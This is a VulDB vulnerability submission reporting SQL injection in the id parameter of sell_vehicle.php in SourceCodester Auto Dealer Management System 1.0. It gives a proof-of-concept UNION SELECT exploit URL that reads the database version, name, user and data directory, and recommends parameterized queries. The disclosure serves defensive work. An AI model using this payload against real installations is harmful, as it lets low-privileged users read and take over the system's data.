Submit #91351: SOURCECODESTER Auto Dealer Management System 1.0 / sell_vehicle.php id SQL Injectioninfo

TitleSOURCECODESTER Auto Dealer Management System 1.0 / sell_vehicle.php id SQL Injection
DescriptionAuto Dealer Management System sell_vehicle.php parameter id is vulnerable to SQL injection attack. Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html Version: v 1.0 Affected Page: - sell_vehicle.php - On this page id parameter is vulnerable to SQL Injection Attack - URL of the vulnerable parameter is: ?page=vehicles/sell_vehicle&id=* Description: The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below - Admin user has full access to the system - Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction) - Employee could perform the SQL Injection by opening sell vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system. Proof of Concept: Following steps are involved: - An employee open the sell vehicle transaction form and could perform the SQL injection with vulnerable parameter (?page=vehicles/sell_vehicle&id=1*) - Full exploit URL is: localhost/adms/admin/?page=vehicles/sell_vehicle&id=1%27+and+false+union+select+1,2,version(),database(),5,6,user(),@@datadir,9,10,11,12,13--+- Recommendation: Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attacks: Example Code: $sql = $obj_admin->db->prepare("SELECT * from `transaction_list` where id = :id "); $sql->bindparam(':id', $id); $sql->execute(); $row = $sql->fetch(PDO::FETCH_ASSOC);
Source⚠️ https://github.com/navaidzansari/CVE_Demo/blob/main/2023/Auto%20Dealer%20Management%20System%20-%20SQL%20Injection%20-%202.md
User
 navaidansari (UID 41266)
Submission02/18/2023 20:16 (3 years ago)
Moderation02/18/2023 20:34 (18 minutes later)
StatusAccepted
VulDB entry221482 [SourceCodester Auto Dealer Management System 1.0 sell_vehicle ID sql injection]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!